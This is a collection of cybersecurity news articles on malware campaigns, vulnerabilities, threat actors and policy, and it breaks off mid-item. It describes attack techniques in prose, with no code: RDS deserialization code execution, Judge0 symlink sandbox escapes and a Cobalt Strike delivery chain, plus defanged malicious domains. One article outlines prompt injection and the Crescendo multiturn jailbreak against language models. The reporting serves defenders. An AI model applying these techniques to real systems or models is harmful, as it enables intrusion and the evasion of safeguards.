H January(68) February(106) March(112) April(110) June(37) July(4)
Millions of Malicious 'Imageless' Containers Planted on Docker Hub Over 5 Years
1.5.24
Virus
The Hacker News
Cybersecurity researchers have
discovered multiple campaigns targeting Docker Hub by planting millions of
malicious "imageless" containers over the past five years, once again
underscoring how open-source registries could pave the way for supply chain
attacks.
"Over four million of the repositories in Docker Hub are imageless and have no content except for the repository documentation," JFrog security researcher Andrey Polkovnichenko said in a report shared with The Hacker News.
What's more, the documentation has no connection whatsoever to the container. Instead, it's a web page that's designed to lure users into visiting phishing or malware-hosting websites.
Of the 4.6 million imageless Docker Hub repositories uncovered, 2.81 million of them are said to have been used as landing pages to redirect unsuspecting users to fraudulent sites as part of three broad campaigns -
Downloader (repositories created in the first half of 2021 and September 2023),
which advertises links to purported pirated content or cheats for video games
but either directly links to malicious sources or a legitimate one that, in
turn, contains JavaScript code that redirects to the malicious payload after 500
milliseconds.
E-book phishing (repositories created in mid-2021), which
redirects users searching for e-books to a website ("rd.lesac.ru") that, in
turn, urges them to enter their financial information to download the e-book.
Website (thousands of repositories created daily from April 2021 to October
2023), which contains a link to an online diary-hosting service called Penzu in
some cases, or a harmless piece of text, suggesting that it could have been used
during early testing phases.
The payload delivered as part of the downloader
campaign is designed to contact a command-and-control (C2) server and transmit
system metadata, following which the server responds with a link to cracked
software.
It's suspected that the attacks may be part of a larger malware operation, which could involve adware or monetization schemes that derive monetary benefit out of distributing third-party software.
On the other hand, the exact goal of the website cluster is currently unclear, with the campaign also propagated on sites that have a lax content moderation policy.
JFrog said it counted a total of 208,739 fake accounts that the threat actors used to create the malicious and unwanted repositories. Docker has since taken down all of them following responsible disclosure.
"The most concerning aspect of these three campaigns is that there is not a lot that users can do to protect themselves at the outset, other than exercising caution," Shachar Menashe, senior director of security research at JFrog, said in a statement shared with The Hacker News.
"We're essentially looking at a malware playground that in some cases has been
three years in the making. These threat actors are highly motivated and are
hiding behind the credibility of the Docker Hub name to lure victims."
With threat actors taking painstaking efforts to poison well known utilities, as evidenced in the case of the XZ Utils compromise, it's imperative that developers exercise caution when it comes to downloading packages from open-source ecosystems/
"As Murphy's Law suggests, if something can be exploited by malware developers, it inevitably will be, so we expect that these campaigns can be found in more repositories than just Docker Hub," Menashe said.
ZLoader Malware Evolves with Anti-Analysis Trick from Zeus Banking Trojan
1.5.24
Virus
The Hacker News
The authors behind the resurfaced
ZLoader malware have added a feature that was originally present in the Zeus
banking trojan that it's based on, indicating that it's being actively
developed.
"The latest version, 2.4.1.0, introduces a feature to prevent execution on machines that differ from the original infection," Zscaler ThreatLabz researcher Santiago Vicente said in a technical report. "A similar anti-analysis feature was present in the leaked ZeuS 2.X source code, but implemented differently."
ZLoader, also called Terdot, DELoader, or Silent Night, emerged after a nearly two-year hiatus around September 2023 following its takedown in early 2022.
A modular trojan with capabilities to load next-stage payloads, recent versions of the malware have added RSA encryption as well as updates to its domain generation algorithm (DGA).
The latest sign of ZLoader's evolution comes in the form of an anti-analysis feature that restricts the binary's execution to the infected machine.
The feature, present in artifacts with versions greater than 2.4.1.0, causes the malware to abruptly terminate if they are copied and executed on another system post-initial infection. This is accomplished by means of a Windows Registry check for a specific key and value.
"The Registry key and value are generated based on a hardcoded seed that is different for each sample," Vicente said.
"If the Registry key/value pair is manually created (or this check is patched), ZLoader will successfully inject itself into a new process. However, it will terminate again after executing only a few instructions. This is due to a secondary check in ZLoader's MZ header."
This means that ZLoader's execution will be stalled in a different machine unless the seed and MZ header values are set correctly and all the Registry and disk paths/names from the originally compromised system are replicated.
Zscaler said the technique used by Zloader to store the installation information and avoid being run on a different host shares similarities with ZeuS version 2.0.8, albeit implemented in a different manner, which relied on a data structure called PeSettings to store the configuration instead of the Registry.
"In recent versions, ZLoader has adopted a stealthy approach to system infections," Vicente said. "This new anti-analysis technique makes ZLoader even more challenging to detect and analyze."
The development comes as threat actors are utilizing fraudulent websites hosted on popular legitimate platforms like Weebly to spread stealer malware and steal data via black hat search engine optimization (SEO) techniques.
"This catapults their fraudulent site to the top of a user's search results, increasing the likelihood of inadvertently selecting a malicious site and potentially infecting their system with malware," Zscaler researcher Kaivalya Khursale said.
A notable aspect of these campaigns is that the infection only proceeds to the payload delivery stage if the visit originates from search engines like Google, Bing, DuckDuckGo, Yahoo, or AOL, and if bogus sites are not accessed directly.
Over the past two months, email-based phishing campaigns have also been observed targeting organizations in the U.S., Turkey, Mauritius, Israel, Russia, and Croatia with Taskun malware, which acts as a facilitator for Agent Tesla, per findings from Veriti.
Ex-NSA Employee Sentenced to 22 Years for Trying to Sell U.S. Secrets to Russia
1.5.24
BigBrothers
The Hacker News
A former employee of the U.S.
National Security Agency (NSA) has been sentenced to nearly 22 years (262
months) in prison for attempting to transfer classified documents to Russia.
"This sentence should serve as a stark warning to all those entrusted with protecting national defense information that there are consequences to betraying that trust," said FBI Director Christopher Wray.
Jareh Sebastian Dalke, 32, of Colorado Springs was employed as an Information Systems Security Designer between June 6 to July 1, 2022, during which time he had access to sensitive information.
Despite his short tenure at the intelligence agency, Dalke is said to have made contact with a person he thought was a Russian agent sometime between August and September of that year. In reality, the person was an undercover agent working for the Federal Bureau of Investigation (FBI).
To demonstrate his "legitimate access and willingness to share," he then emailed the purported Russian agent snippets of three top-secret National Defense Information (NDI) documents that were obtained during his employment using an encrypted email account.
Dalke, who demanded $85,000 in return for sharing all the files in his possession, claimed the information would be of value to Russia and told his contact that he would share more documents upon his return to Washington, D.C.
He was subsequently arrested on September 28, 2022, shortly after he transferred five files to the supposed Russian spy at Union Station in downtown Denver via a laptop computer. The defendant pleaded guilty to the crime in October 2023.
"As part of his plea agreement, Dalke admitted that he willfully transmitted files to the FBI online covert employee with the intent and reason to believe the information would be used to injure the United States and to benefit Russia," the U.S. Justice Department said.
U.S. Government Releases New AI Security Guidelines for Critical Infrastructure
30.4.24
AI
The Hacker News
The U.S. government has unveiled
new security guidelines aimed at bolstering critical infrastructure against
artificial intelligence (AI)-related threats.
"These guidelines are informed by the whole-of-government effort to assess AI risks across all sixteen critical infrastructure sectors, and address threats both to and from, and involving AI systems," the Department of Homeland Security (DHS) said Monday.
In addition, the agency said it's working to facilitate safe, responsible, and trustworthy use of the technology in a manner that does not infringe on individuals' privacy, civil rights, and civil liberties.
The new guidance concerns the use of AI to augment and scale attacks on critical infrastructure, adversarial manipulation of AI systems, and shortcomings in such tools that could result in unintended consequences, necessitating the need for transparency and secure by design practices to evaluate and mitigate AI risks.
Specifically, this spans four different functions such as govern, map, measure, and manage all through the AI lifecycle -
Establish an organizational culture of AI risk management
Understand your
individual AI use context and risk profile
Develop systems to assess,
analyze, and track AI risks
Prioritize and act upon AI risks to safety and
security
"Critical infrastructure owners and operators should account for
their own sector-specific and context-specific use of AI when assessing AI risks
and selecting appropriate mitigations," the agency said.
"Critical infrastructure owners and operators should understand where these dependencies on AI vendors exist and work to share and delineate mitigation responsibilities accordingly."
The development arrives weeks after the Five Eyes (FVEY) intelligence alliance comprising Australia, Canada, New Zealand, the U.K., and the U.S. released a cybersecurity information sheet noting the careful setup and configuration required for deploying AI systems.
"The rapid adoption, deployment, and use of AI capabilities can make them highly valuable targets for malicious cyber actors," the governments said.
"Actors, who have historically used data theft of sensitive information and intellectual property to advance their interests, may seek to co-opt deployed AI systems and apply them to malicious ends."
The recommended best practices include taking steps to secure the deployment environment, review the source of AI models and supply chain security, ensure a robust deployment environment architecture, harden deployment environment configurations, validate the AI system to ensure its integrity, protect model weights, enforce strict access controls, conduct external audits, and implement robust logging.
Earlier this month, the CERT Coordination Center (CERT/CC) detailed a shortcoming in the Keras 2 neural network library that could be exploited by an attacker to trojanize a popular AI model and redistribute it, effectively poisoning the supply chain of dependent applications.
Recent research has found AI systems to be vulnerable to a wide range of prompt injection attacks that induce the AI model to circumvent safety mechanisms and produce harmful outputs.
"Prompt injection attacks through poisoned content are a major security risk because an attacker who does this can potentially issue commands to the AI system as if they were the user," Microsoft noted in a recent report.
One such technique, dubbed Crescendo, has been described as a multiturn large language model (LLM) jailbreak, which, like Anthropic's many-shot jailbreaking, tricks the model into generating malicious content by "asking carefully crafted questions or prompts that gradually lead the LLM to a desired outcome, rather than asking for the goal all at once."
LLM jailbreak prompts have become popular among cybercriminals looking to craft effective phishing lures, even as nation-state actors have begun weaponizing generative AI to orchestrate espionage and influence operations.
Even more concerningly, studies from the University of Illinois Urbana-Champaign has discovered that LLM agents can be put to use to autonomously exploit one-day vulnerabilities in real-world systems simply using their CVE descriptions and "hack websites, performing tasks as complex as blind database schema extraction and SQL injections without human feedback."
New U.K. Law Bans Default Passwords on Smart Devices Starting April 2024
30.4.24
BigBrothers
The Hacker News
The U.K. National Cyber Security
Centre (NCSC) is calling on manufacturers of smart devices to comply with new
legislation that prohibits them from using default passwords, effective April
29, 2024.
"The law, known as the Product Security and Telecommunications Infrastructure act (or PSTI act), will help consumers to choose smart devices that have been designed to provide ongoing protection against cyber attacks," the NCSC said.
To that end, manufacturers are required to not supply devices that use guessable default passwords, provide a point of contact to report security issues, and state the duration for which their devices are expected to receive important security updates.
Default passwords can not only be easily found online, they also act as a vector for threat actors to log in to devices for follow-on exploitation. That said, a unique default password is permissible under the law.
The law, which aims to enforce a set of minimum security standards across the board and prevent vulnerable devices from being corralled into a DDoS botnet like Mirai, applies to the following products that can be connected to the internet -
Smart speakers, smart TVs, and streaming devices
Smart doorbells, baby
monitors, and security cameras
Cellular tablets, smartphones, and game
consoles
Wearable fitness trackers (including smart watches)
Smart
domestic appliances (such as light bulbs, plugs, kettles, thermostats, ovens,
fridges, cleaners, and washing machines)
Companies that fail to adhere to the
provisions of the PSTI act are liable to face recalls and monetary penalties,
attracting fines of up to £10 million ($12.5 million) or 4% of their global
annual revenues, depending on whichever is higher.
The development makes the U.K. the first country in the world to outlaw default
usernames and passwords from IoT devices. According to Cloudflare's DDoS threat
report for Q1 2024, Mirai-based attacks continue to be prevalent despite the
original botnet being taken down in 2016.
"Four out of every 100 HTTP DDoS attacks, and two out of every 100 L3/4 DDoS attacks are launched by a Mirai-variant botnet," Omer Yoachimik and Jorge Pacheco said. "The Mirai source code was made public, and over the years there have been many permutations of the original."
It also follows a $196 million fine issued by the U.S. Federal Communications Commission (FCC) against telecom carriers AT&T ($57 million), Sprint ($12 million), T-Mobile ($80 million), and Verizon ($47 million) for illegally sharing customers' real-time location data without their consent to aggregators like LocationSmart and Zumigo, who then sold the information to third-party location-based service providers.
"No one who signed up for a cell plan thought they were giving permission for their phone company to sell a detailed record of their movements to anyone with a credit card," U.S. Senator Ron Wyden, who revealed the practice in 2018, said in a statement.
Google Prevented 2.28 Million Malicious Apps from Reaching Play Store in 2023
30.4.24
OS
The Hacker News
Google on Monday revealed that
almost 200,000 app submissions to its Play Store for Android were either
rejected or remediated to address issues with access to sensitive data such as
location or SMS messages over the past year.
The tech giant also said it blocked 333,000 bad accounts from the app storefront in 2023 for attempting to distribute malware or for repeated policy violations.
"In 2023, we prevented 2.28 million policy-violating apps from being published on Google Play in part thanks to our investment in new and improved security features, policy updates, and advanced machine learning and app review processes," Google's Steve Kafka, Khawaja Shams, and Mohet Saxena said.
"To help safeguard user privacy at scale, we partnered with SDK providers to limit sensitive data access and sharing, enhancing the privacy posture for over 31 SDKs impacting 790K+ apps."
In comparison, Google fended off 1.43 million bad apps from being published to the Play Store in 2022, alongside banning 173,000 bad accounts over the same time period.
In addition, the Mountain View-based firm said it strengthened its developer onboarding and review processes, requiring them to furnish more identity information and complete a verification process when setting up their Play Console developer accounts.
This, the company noted, enables it to better understand the developer community and root out bad actors from gaming the system to propagate malicious apps.
The development comes as Google is taking a series of steps to secure the Android ecosystem. Last November, it moved the App Defense Alliance (ADA), which it launched in November 2019, under the Linux Foundation umbrella, with Meta and Microsoft joining as the founding steering members.
Around the same time, the company also rolled out real-time scanning at the code level to tackle novel Android malware and an "Independent security review" badge in the Play Store's Data safety section for VPN apps that have undergone a Mobile Application Security Assessment (MASA) audit.
On the user-facing side of things, Google has also taken the step of taking down approximately 1.5 million applications from the Play Store that do not target the most recent APIs.
Google's ongoing fight to tackle malicious actors on Android coincides with a lawsuit filed by the company in the U.S. against two China-based fraudsters who are alleged to have engaged in an international online consumer investment fraud scheme and tricked users into downloading fake apps from the Play Store and other sources and ultimately stealing their funds.
China-Linked 'Muddling Meerkat' Hijacks DNS to Map Internet on Global Scale
30.4.24
APT
The Hacker News
A previously undocumented cyber
threat dubbed Muddling Meerkat has been observed undertaking sophisticated
domain name system (DNS) activities in a likely effort to evade security
measures and conduct reconnaissance of networks across the world since October
2019.
Cloud security firm Infoblox described the threat actor as likely affiliated with the People's Republic of China (PRC) with the ability to control the Great Firewall (GFW), which censors access to foreign websites and manipulates internet traffic to and from the country.
The moniker is reference to the "bewildering" nature of their operations and the actor's abuse of DNS open resolvers – which are DNS servers that accept recursive queries from all IP addresses – to send queries from the Chinese IP space.
"Muddling Meerkat demonstrates a sophisticated understanding of DNS that is uncommon among threat actors today – clearly pointing out that DNS is a powerful weapon leveraged by adversaries," the company said in a report shared with The Hacker News.
More specifically, it entails triggering DNS queries for mail exchange (MX) and other record types to domains not owned by the actor but which reside under well-known top-level domains such as .com and .org.
Infoblox, which discovered the threat actor from anomalous DNS MX record requests that were sent to its recursive resolvers by customer devices, said it detected over 20 such domains -
4u[.]com, kb[.]com, oao[.]com, od[.]com, boxi[.]com, zc[.]com, s8[.]com, f4[.]com, b6[.]com, p3z[.]com, ob[.]com, eg[.]com, kok[.]com, gogo[.]com, aoa[.]com, gogo[.]com, zbo6[.]com, id[.]com, mv[.]com, nef[.]com, ntl[.]com, tv[.]com, 7ee[.]com, gb[.]com, tunk[.]org, q29[.]org, ni[.]com, tt[.]com, pr[.]com, dec[.]com
"Muddling Meerkat elicits a special kind of fake DNS MX record from the Great Firewall which has never been seen before," Dr. Renée Burton, vice president of threat intelligence for Infoblox, told The Hacker News. "For this to happen, Muddling Meerkat must have a relationship with the GFW operators."
"The target domains are the domain used in the queries, so it is not necessarily the target of an attack. It is the domain used to carry out the probe attack. These domains are not owned by Muddling Meerkat."
It's known that the GFW relies on what's called DNS spoofing and tampering to
inject fake DNS responses containing random real IP addresses when a request
matches a banned keyword or a blocked domain.
In other words, when a user attempts to search for a blocked keyword or phrase, the GFW blocks or redirects the website query in a manner that will prevent the user from accessing the requested information. This is achieved via techniques like DNS cache poisoning or IP address blocking.
This also means that if the GFW detects a query to a blocked website, the sophisticated tool injects a bogus DNS reply with an invalid IP address, or an IP address to a different domain, effectively corrupting the cache of recursive DNS servers located within its borders.
"The most remarkable feature of Muddling Meerkat is the presence of false MX record responses from Chinese IP addresses," Burton said. "This behavior [...] differs from the standard behavior of the GFW."
"These resolutions are sourced from Chinese IP addresses that do not host DNS services and contain false answers, consistent with the GFW. However, unlike the known behavior of the GFW, Muddling Meerkat MX responses include not IPv4 addresses but properly formatted MX resource records instead."
The exact motivation behind the multi-year activity is unclear, although it raised the possibility that it may be undertaken as part of an internet mapping effort or research of some kind.
"Muddling Meerkat is a Chinese nation-state actor performing deliberate and highly skilled DNS operations against global networks on an almost daily basis – and the full scope of their operation can not be seen in any one location," Burton said.
"Malware is easier than DNS in this sense – once you locate the malware, it is straightforward to understand it. Here, we know something is happening, but don't understand it fully. CISA, the FBI, and other agencies continue to warn of Chinese prepositioning operations that are undetected. We should be worried about anything we can't fully see or understand."
New R Programming Vulnerability Exposes Projects to Supply Chain Attacks
30.4.24
Vulnerebility
The Hacker News
A security vulnerability has been
discovered in the R programming language that could be exploited by a threat
actor to create a malicious RDS (R Data Serialization) file such that it results
in code execution when loaded and referenced.
The flaw, assigned the CVE identifier CVE-2024-27322 (CVSS score: 8.8), "involves the use of promise objects and lazy evaluation in R," AI application security company HiddenLayer said in a report shared with The Hacker News.
RDS, like pickle in Python, is a format used to serialize and save the state of data structures or objects in R, an open-source programming language used in statistical computing, data visualization, and machine learning.
This process of serialization – serialize() or saveRDS() – and deserialization – unserialize() and readRDS() – is also leveraged when saving and loading R packages.
The root cause behind CVE-2024-27322 lies in the fact that it could lead to arbitrary code execution when deserializing untrusted data, thus leaving users exposed to supply chain attacks through specially crafted R packages.
An attacker looking to weaponize the flaw could therefore take advantage of the
fact that R packages leverage the RDS format to save and load data, causing
automatic code execution when the package is decompressed and deserialized.
"R packages are vulnerable to this exploit and can, therefore, be used as part
of a supply chain attack via package repositories," security researchers Kasimir
Schulz and Kieran Evans said. "For an attacker to take over an R package, all
they need to do is overwrite the rdx file with the maliciously crafted file, and
when the package is loaded, it will automatically execute the code."
The security defect has been addressed in version 4.4.0 released on April 24,
2024, following responsible disclosure.
"An attacker can exploit this [flaw] by crafting a file in RDS format that
contains a promise instruction setting the value to unbound_value and the
expression to contain arbitrary code," HiddenLayer said. "Due to lazy
evaluation, the expression will only be evaluated and run when the symbol
associated with the RDS file is accessed."
"Therefore if this is simply an RDS file, when a user assigns it a symbol
(variable) in order to work with it, the arbitrary code will be executed when
the user references that symbol. If the object is compiled within an R package,
the package can be added to an R repository such as CRAN, and the expression
will be evaluated and the arbitrary code run when a user loads that package."
Update#
"An attacker can create malicious .rds and .rdx files and use social engineering
to distribute those files to execute arbitrary code on the victim's device,"
CERT/CC said. "Projects that use readRDS on untrusted files are also vulnerable
to the attack."
The CERT Coordination Center (CERT/CC) has released an advisory for
CVE-2024-27322, noting that the flaw could be exploited to achieve arbitrary
code execution on the victim's target device via malicious RDS or rdx files.
Sandbox Escape Vulnerabilities in Judge0 Expose Systems to Complete Takeover
30.4.24
Vulnerebility
The Hacker News
Multiple critical security flaws
have been disclosed in the Judge0 open-source online code execution system that
could be exploited to obtain code execution on the target system.
The three flaws, all critical in nature, allow an "adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine," Australian cybersecurity firm Tanto Security said in a reportreport published today.
Judge0 (pronounced "judge zero") is described by its maintainers as a "robust, scalable, and open-source online code execution system" that can be used to build applications that require online code execution features such as candidate assessment, e-learning, and online code editors and IDEs.
According to its website, the service is used by 23 customers like AlgoDaily, CodeChum, and PYnative, among others. The project has been forked 412 times on GitHub to date.
The flaws, discovered and reported by Daniel Cooper in March 2024, are listed below -
CVE-2024-28185 (CVSS score: 10.0) - The application does not account for
symlinks placed inside the sandbox directory, which can be leveraged by an
attacker to write to arbitrary files and gain code execution outside of the
sandbox.
CVE-2024-28189 (CVSS score: 10.0) - A patch bypass for
CVE-2024-28185 that stems from the use of the UNIX chown command on an untrusted
file within the sandbox. An attacker can abuse this by creating a symbolic link
(symlink) to a file outside the sandbox, allowing the attacker to run chown on
arbitrary files outside of the sandbox.
CVE-2024-29021 (CVSS score: 9.1) -
The default configuration of Judge0 leaves the service vulnerable to a sandbox
escape via Server-Side Request Forgery (SSRF). This allows an attacker with
sufficient access to the Judge0 API to obtain unsandboxed code execution as root
on the target machine.
The problem is rooted in a Ruby script named
"isolate_job.rb," which is responsible for setting up the sandbox, as well
running the code and storing the results of the execution.
Specifically, it entails creating a symbolic link in the directory before a bash script is set up to execute the program based on the submission language such that it allows writing to an arbitrary file on the unsandboxed system.
A threat actor could leverage this flaw to overwrite scripts on the system and gain code execution outside of the sandbox and on the Docker container running the submission job.
What's more, the attacker could escalate their privileges outside of the Docker container due to it being run using the privileged flag as specified in docker-compose.yml.
"This will allow the attacker to mount the Linux host filesystem and the attacker can then write files (for example a malicious cron job) to gain access to the system," Judge0's Herman Došilović said.
"From this point the attacker will have complete access to the Judge0 system including the database, internal networks, the Judge0 web server, and any other applications running on the Linux host."
CVE-2024-29021, on the other hand, has to do with a configuration that permits communicating with Judge0's PostgreSQL database available inside the internal Docker network, thus enabling the adversary to weaponize the SSRF to connect to the database and change the datatype of relevant columns and ultimately gain command injection.
Following responsible disclosure, the shortcomings have been addressed in version 1.13.1 released on April 18, 2024. Users of Judge0 are advised to update to the latest version to mitigate potential threats.
Okta Warns of Unprecedented Surge in Proxy-Driven Credential Stuffing Attacks
30.4.24
Hacking
The Hacker News
Identity and access management
(IAM) services provider Okta has warned of a spike in the "frequency and scale"
of credential stuffing attacks aimed at online services.
These unprecedented attacks, observed over the last month, are said to be facilitated by "the broad availability of residential proxy services, lists of previously stolen credentials ('combo lists'), and scripting tools," the company said in an alert published Saturday.
The findings build on a recent advisory from Cisco, which cautioned of a global surge in brute-force attacks targeting various devices, including Virtual Private Network (VPN) services, web application authentication interfaces, and SSH services, since at least March 18, 2024.
"These attacks all appear to be originating from TOR exit nodes and a range of other anonymizing tunnels and proxies," Talos noted at the time, adding targets of the attacks comprise VPN appliances from Cisco, Check Point, Fortinet, SonicWall, as well as routers from Draytek, MikroTik, and Ubiquiti.
Okta said its Identity Threat Research detected an uptick in credential stuffing activity against user accounts from April 19 to April 26, 2024, from likely similar infrastructure.
Credential stuffing is a type of cyber attack in which credentials obtained from a data breach on one service are used to attempt to sign in to another unrelated service.
Alternatively, such credentials could be extracted via phishing attacks that redirect victims to credential harvesting pages or through malware campaigns that install information stealers on compromised systems.
"All recent attacks we have observed share one feature in common: they rely on requests being routed through anonymizing services such as TOR," Okta said.
"Millions of the requests were also routed through a variety of residential proxies including NSOCKS, Luminati, and DataImpulse."
Residential proxies (RESIPs) refer to networks of legitimate user devices that are misused to route traffic on behalf of paying subscribers without their knowledge or consent, thereby allowing threat actors to conceal their malicious traffic.
This is typically achieved by installing proxyware tools on computers, mobile phones, or routers, effectively enrolling them into a botnet that's then rented to customers of the service who desire to anonymize the source of their traffic.
"Sometimes a user device is enrolled in a proxy network because the user consciously chooses to download 'proxyware' into their device in exchange for payment or something else of value," Okta explained.
"At other times, a user device is infected with malware without the user's knowledge and becomes enrolled in what we would typically describe as a botnet."
Last month, HUMAN's Satori Threat Intelligence team revealed over two dozen malicious Android VPN apps that turn mobile devices into RESIPs by means of an embedded software development kit (SDK) that included the proxyware functionality.
"The net sum of this activity is that most of the traffic in these credential stuffing attacks appear to originate from the mobile devices and browsers of everyday users, rather than from the IP space of VPS providers," Okta said.
To mitigate the risk of account takeovers, the company is recommending that organizations enforce users to switch to strong passwords, enable two-factor authentication (2FA), deny requests originating from locations where they don't operate and IP addresses with poor reputation, and add support for passkeys.
Ukraine Targeted in Cyberattack Exploiting 7-Year-Old Microsoft Office Flaw
30.4.24
Vulnerebility
The Hacker News
Cybersecurity researchers have discovered a targeted operation against Ukraine that has been found leveraging a nearly seven-year-old flaw in Microsoft Office to deliver Cobalt Strike on compromised systems.
The attack chain, which took place at the end of 2023 according to Deep Instinct, employs a PowerPoint slideshow file ("signal-2023-12-20-160512.ppsx") as the starting point, with the filename implying that it may have been shared via the Signal instant messaging app.
That having said, there is no actual evidence to indicate that the PPSX file was distributed in this manner, even though the Computer Emergency Response Team of Ukraine (CERT-UA) has uncovered two different campaigns that have used the messaging app as a malware delivery vector in the past.
Just last week, the agency disclosed that Ukrainian armed forces are being increasingly targeted by the UAC-0184 group via messaging and dating platforms to serve malware like HijackLoader (aka GHOSTPULSE and SHADOWLADDER), XWorm, and Remcos RAT, as well as open-source programs such as sigtop and tusc to exfiltrate data from computers.
"The PPSX (PowerPoint slideshow) file appears to be an old instruction manual of the U.S. Army for mine clearing blades (MCB) for tanks," security researcher Ivan Kosarev said. "The PPSX file includes a remote relationship to an external OLE object."
This involves the exploitation of CVE-2017-8570 (CVSS score: 7.8), a now-patched remote code execution bug in Office that could allow an attacker to perform arbitrary actions upon convincing a victim to open a specially crafted file, to load a remote script hosted on weavesilk[.]space.
The heavily obfuscated script subsequently launches an HTML file containing
JavaScript code, which, in turn, sets up persistence on the host via Windows
Registry and drops a next-stage payload that impersonates the Cisco AnyConnect
VPN client.
The payload includes a dynamic-link library (DLL) that ultimately injects a cracked Cobalt Strike Beacon, a legitimate pen-testing tool, directly into system memory and awaits for further instructions from a command-and-control (C2) server ("petapixel[.]fun").
The DLL also packs in features to check if it's being executed in a virtual machine and evade detection by security software.
Deep Instinct said it could neither link the attacks to a specific threat actor or group nor exclude the possibility of a red teaming exercise. Also unclear is the exact end goal of the intrusion.
"The lure contained military-related content, suggesting it was targeting military personnel," Kosarev said.
"But the domain names weavesilk[.]space and petapixel[.]fun are disguised as an obscure generative art site (weavesilk[.]com) and a popular photography site (petapixel[.]com). These are unrelated, and it's a bit puzzling why an attacker would use these specifically to fool military personnel."
Sandworm Targets Critical Infra in Ukraine#
The disclosure comes as CERT-UA
revealed that about 20 energy, water, and heating suppliers in Ukraine have been
targeted by a Russian state-sponsored group called UAC-0133, a sub-cluster
within Sandworm (aka APT44, FROZENBARENTS, Seashell Blizzard, UAC-0002, and
Voodoo Bear), which is responsible for a bulk of all the disruptive and
destructive operations against the country.
The attacks, which aimed to sabotage critical operations, involve the use of malware like Kapeka (aka ICYWELL, KnuckleTouch, QUEUESEED, and wrongsens) and its Linux variant BIASBOAT, in addition to GOSSIPFLOW and LOADGRIP.
While GOSSIPFLOW is a Golang-based SOCKS5 proxy, LOADGRIP is an ELF binary
written in C that's used to load BIASBOAT on compromised Linux hosts.
Sandworm is a prolific and highly adaptive threat group linked to Unit 74455 within the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). It's known to be active since at least 2009, with the adversary also tied to three hack-and-leak hacktivist personas such as XakNet Team, CyberArmyofRussia_Reborn, and Solntsepek.
"Sponsored by Russian military intelligence, APT44 is a dynamic and operationally mature threat actor that is actively engaged in the full spectrum of espionage, attack, and influence operations," Mandiant said, describing the advanced persistent threat (APT) as engaged in a multi-pronged effort to help Russia gain a wartime advantage since January 2022.
"APT44 operations are global in scope and mirror Russia's wide ranging national interests and ambitions. Patterns of activity over time indicate that APT44 is tasked with a range of different strategic priorities and is highly likely seen by the Kremlin as a flexible instrument of power capable of serving both enduring and emerging intelligence requirements."
Bogus npm Packages Used to Trick Software Developers into Installing Malware
30.4.24
Virus
The Hacker News
An ongoing social engineering
campaign is targeting software developers with bogus npm packages under the
guise of a job interview to trick them into downloading a Python backdoor.
Cybersecurity firm Securonix is tracking the activity under the name DEV#POPPER, linking it to North Korean threat actors.
"During these fraudulent interviews, the developers are often asked to perform tasks that involve downloading and running software from sources that appear legitimate, such as GitHub," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said. "The software contained a malicious Node JS payload that, once executed, compromised the developer's system."
Details of the campaign first emerged in late November 2023, when Palo Alto Networks Unit 42 detailed an activity cluster dubbed Contagious Interview in which the threat actors pose as employers to lure software developers into installing malware such as BeaverTail and InvisibleFerret through the interview process.
Then earlier this February, software supply chain security firm Phylum uncovered a set of malicious packages on the npm registry that delivered the same malware families to siphon sensitive information from compromised developer systems.
It's worth noting that Contagious Interview is said to be disparate from Operation Dream Job (aka DeathNote or NukeSped), with Unit 42 telling The Hacker News that the former is "focused on targeting developers, mainly through fake identities in freelance job portals, and the next stages involve the use of developer tools and npm packages leading to [...] BeaverTail and InvisibleFerret."
Operation Dream Job, linked to the prolific Lazarus Group from North Korea, is a long-running offensive campaign that sends unsuspecting professionals employed in various sectors like aerospace, cryptocurrency, defense, and others malicious files dressed as job offers to distribute malware.
First uncovered by Israeli cybersecurity firm ClearSky at the start of 2020, it also exhibits overlaps with two other Lazarus clusters known as Operation In(ter)ception and Operation North Star.
The attack chain detailed by Securonix starts with a ZIP archive hosted on GitHub that's likely sent to the target as part of the interview. Present within the file is a seemingly innocuous npm module that harbors a malicious JavaScript file codenamed BeaverTail that acts as an information stealer and a loader for a Python backdoor called InvisibleFerret that's retrieved from a remote server.
The implant, besides gathering system information, is capable of command execution, file enumeration and exfiltration, and clipboard and keystroke logging.
The development is a sign that North Korean threat actors continue to hone a raft of weapons for their cyber attack arsenal, consistently updating their tradecraft with improved abilities to hide their actions and blend in on host systems and networks, not to mention siphon off data and turn compromises into financial gain.
"When it comes to attacks which originate through social engineering, it's critical to maintain a security-focused mindset, especially during intense and stressful situations like job interviews," Securonix researchers said.
"The attackers behind the DEV#POPPER campaigns abuse this, knowing that the person on the other end is in a highly distracted and in a much more vulnerable state."
Severe Flaws Disclosed in Brocade SANnav SAN Management Software
27.4.24
Vulnerebility
The Hacker News
Several security vulnerabilities
disclosed in Brocade SANnav storage area network (SAN) management application
could be exploited to compromise susceptible appliances.
The 18 flaws impact all versions up to and including 2.3.0, according to independent security researcher Pierre Barre, who discovered and reported them.
The issues range from incorrect firewall rules, insecure root access, and Docker misconfigurations to lack of authentication and encryption, thus allowing an attacker to intercept credentials, overwrite arbitrary files, and completely breach the device.
Some of the most severe flaws are listed below -
CVE-2024-2859 (CVSS score: 8.8) - A vulnerability that could allow an
unauthenticated, remote attacker to log in to an affected device using the root
account and execute arbitrary commands
CVE-2024-29960 (CVSS score: 7.5) - The
use of hard-coded SSH keys in the OVA image, which could be exploited by an
attacker to decrypt the SSH traffic to the SANnav appliance and compromise it.
CVE-2024-29961 (CVSS score: 8.2) - A vulnerability that can allow an
unauthenticated, remote attacker to stage a supply chain attack by taking
advantage of the fact the SANnav service sends ping commands in the background
at periodic intervals to the domains gridgain[.]com and ignite.apache[.]org to
check for updates
CVE-2024-29963 (CVSS score: 8.6) - The use of hard-coded
Docker keys in SANnav OVA to reach remote registries over TLS, thereby allowing
an attacker to carry out adversary-in-the-middle (AitM) attack on the traffic
CVE-2024-29966 (CVSS score: 7.5) - The presence of hard-coded credentials for
root users in publicly-available documentation that could permit an
unauthenticated attacker full access to the Brocade SANnav appliance.
Following responsible disclosure twice in August 2022 and May 2023, the flaws
have been addressed in SANnav version 2.3.1 released in December 2023. Brocade's
parent company Broadcom, which also owns Symantec and VMware, released
advisories for the flaws earlier this month.
Hewlett Packard Enterprise has also shipped patches for a subset of these vulnerabilities in HPE SANnav Management Portal versions 2.3.0a and 2.3.1 as of April 18, 2024.
New 'Brokewell' Android Malware Spread Through Fake Browser Updates
27.4.24
OS
The Hacker News
Fake browser updates are being used
